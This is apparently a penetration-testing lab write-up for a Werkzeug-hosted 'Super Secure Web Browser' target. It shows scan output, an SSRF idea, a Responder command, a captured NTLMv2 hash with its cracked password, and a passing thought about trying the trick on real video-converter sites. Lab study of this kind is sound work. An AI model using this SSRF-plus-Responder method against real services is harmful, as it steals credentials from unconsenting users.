5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http syn-ack ttl 127 Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
| http-methods:
WhatWeb report for http://192.168.105.165:8080
Status : 200 OK
Title : Super Secure Web Browser
IP : 192.168.105.165
Country : RESERVED, ZZ
Summary : Bootstrap[3.3.6], HTML5, HTTPServer[Werkzeug/2.0.1 Python/3.9.0], JQuery[2.2.2], Python[3.9.0], Script, Werkzeug[2.0.1]
Detected Plugins:
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Version : 3.3.6
Website : https://getbootstrap.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Werkzeug/2.0.1 Python/3.9.0 (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 2.2.2
Website : http://jquery.com/
[ Python ]
Python is a programming language that lets you work more
quickly and integrate your systems more effectively. You
can learn to use Python and see almost immediate gains in
productivity and lower maintenance costs.
Version : 3.9.0
Website : http://www.python.org/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ Werkzeug ]
Werkzeug is a WSGI utility library for Python.
Version : 2.0.1
Website : http://werkzeug.pocoo.org/
HTTP Headers:
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 3608
Server: Werkzeug/2.0.1 Python/3.9.0
Date: Thu, 14 Jul 2022 20:10:20 GMT
Its a web browser, which i could refer back and it would visit my links.
I tried different approaches such as uploading php files, asp, aspx, but with no avail. However, theres some cool shit i heard long time ago from a post I saw on LinkedIN. "If there is a url input, there is SSRF".
"A successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform arbitrary command execution."
Apparently if you listen with responder you are able to capture an NTLMv2 hash.
responder -I tun0 -wv
Notice how the website is some sort of brower. I wonder what sort of stuff one can do with SSRF, I know so many websites that are like this. I used to use obviously legal youtube video converters and they required you to input a link, which I'm guessing if I fired up my own webserver I would be able to capture hashes with Responder and do some other crazy stuff. I will definitely go through the SSRF section on PortSwiggerAcademy.
ENOX::HEIST:ab8d09243f9210b2:00915cc0e81fe5868657b0d8c18d07b6:01010000000000007c064802cd97d801089b45b936583ff3000000000200080042004a004100320001001e00570049004e002d004c004d0030003400480037004c00550031004d004c000400140042004a00410032002e004c004f00430041004c0003003400570049004e002d004c004d0030003400480037004c00550031004d004c002e0042004a00410032002e004c004f00430041004c000500140042004a00410032002e004c004f00430041004c0008003000300000000000000000000000003000007a29a27863f5d1ad6883fe224b91c4f66e576fa3fc0afa4d9593d7e005faf3db0a001000000000000000000000000000000000000900260048005400540050002f003100390032002e003100360038002e00340039002e003100300035000000000000000000:california
california
